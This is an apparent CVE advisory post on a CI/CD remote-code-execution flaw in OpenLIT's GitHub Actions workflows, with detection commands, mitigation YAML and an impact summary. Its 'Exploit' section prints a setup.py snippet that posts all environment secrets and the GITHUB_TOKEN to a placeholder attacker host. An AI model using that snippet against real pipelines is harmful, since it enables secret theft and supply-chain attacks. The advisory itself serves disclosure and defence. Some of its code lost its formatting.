Listen to this Post
This vulnerability resides in the GitHub Actions workflows of the OpenLIT AI engineering platform. Prior to version 1.37.1, several workflows (including those for Pylint, Python tests, and Docker tests) are triggered using the `pull_request_target` event . This event is designed to run workflows with the security context and secrets from the target (base) repository, even when the pull request originates from a public fork. The critical flaw is that these workflows then check out and execute the code from the forked pull request by using `actions/checkout` with `ref: ${{ github.event.pull_request.head.sha }}` . This allows an attacker to submit a pull request containing malicious code in files like `tests/requirements.txt` or a test script. When the workflow runs, it executes this attacker-controlled code within the base repository’s secure environment, which has access to a write-privileged `GITHUB_TOKEN` and numerous production secrets, including API keys for OpenAI, Anthropic, Google Cloud, and various database tokens . The result is a complete compromise of the CI/CD pipeline, leading to remote code execution and mass secret exfiltration .
dailycve form:
Platform: OpenLIT
Version: < 1.37.1
Vulnerability : CI/CD RCE
Severity: CRITICAL
date: 2026-02-25
Prediction: Patch already available
What Undercode Say:
Analytics:
To identify vulnerable workflows in a repository, use `grep` to search for the insecure pattern.
Search for the vulnerable pull_request_target event combined with checkout of the PR head grep -r -A 5 "pull_request_target" .github/workflows/ | grep "actions/checkout" -B 5 | grep "head.sha"
A more precise check using `yq` (a YAML processor) can be done with a script.
Example analytic to find workflows using pull_request_target and checking out PR head
find .github/workflows -name ".yml" -exec sh -c '
if yq e ".on.pull_request_target" "{}" | grep -q "."; then
if yq e ".jobs..steps[] | select(.uses == \"actions/checkout\") | .with.ref" "{}" | grep -q "head.sha"; then
echo "Vulnerable pattern found in: {}"
fi
fi
' \;
Exploit:
An attacker can create a malicious fork and submit a pull request. The exploit code, placed in a file like sdk/python/tests/requirements.txt, would use a custom package with a `setup.py` that exfiltrates secrets.
Malicious code in setup.py of a package listed in requirements.txt
import os
import requests
import json
Exfiltrate all environment variables (secrets) to an attacker's server
secrets_data = json.dumps(dict(os.environ))
requests.post("https://attacker.requestbin.net/", data=secrets_data)
Specifically target and exfiltrate the GITHUB_TOKEN for repository write access
github_token = os.environ.get("GITHUB_TOKEN")
if github_token:
requests.post("https://attacker.requestbin.net/token", data=github_token)
The pull request targeting the `main` branch will trigger the vulnerable workflow, executing this code and leaking all secrets .
Protection from this CVE:
The primary fix is to upgrade OpenLIT to version 1.37.1 or later . As a workaround or general best practice, replace `pull_request_target` with `pull_request` for any workflow that checks out and builds code from a fork . If `pull_request_target` is required, do not check out the pull request head; instead, use a two-step process with a “safe-to-test” label. Also, apply least-privilege permissions to the `GITHUB_TOKEN` at the workflow level.
Mitigation: Restrict token permissions and avoid pull_request_target name: Secure Workflow on: pull_request: Use pull_request instead of pull_request_target branches: [ "main" ] permissions: Set minimal permissions for the GITHUB_TOKEN contents: read No write permissions are granted by default jobs: test: runs-on: ubuntu-latest steps: - name: Checkout code uses: actions/checkout@v4 Checks out the merge commit, not the PR head with secrets context
Impact:
Successful exploitation of this CVE allows an attacker to execute arbitrary code in the context of the OpenLIT CI/CD pipeline . This leads to the immediate exfiltration of a vast array of sensitive secrets, including API keys for numerous AI services (OpenAI, Anthropic, etc.), database tokens (Pinecone, Qdrant, Milvus), and a Google Cloud service account key . With the write-privileged GITHUB_TOKEN, an attacker can push malicious code to the repository, tamper with releases, and perform a software supply chain attack. The compromised GCP service account could be used to access or destroy cloud infrastructure and data, leading to a widespread and severe breach of the entire AI engineering platform and its associated resources. The CVSS score of 9.9 (Critical) reflects the high impact on confidentiality, integrity, and availability .
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow DailyCVE & Stay Tuned:
𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin
Laravel Reverb, Insecure Deserialization, CVE-2026-23524 (Critical)
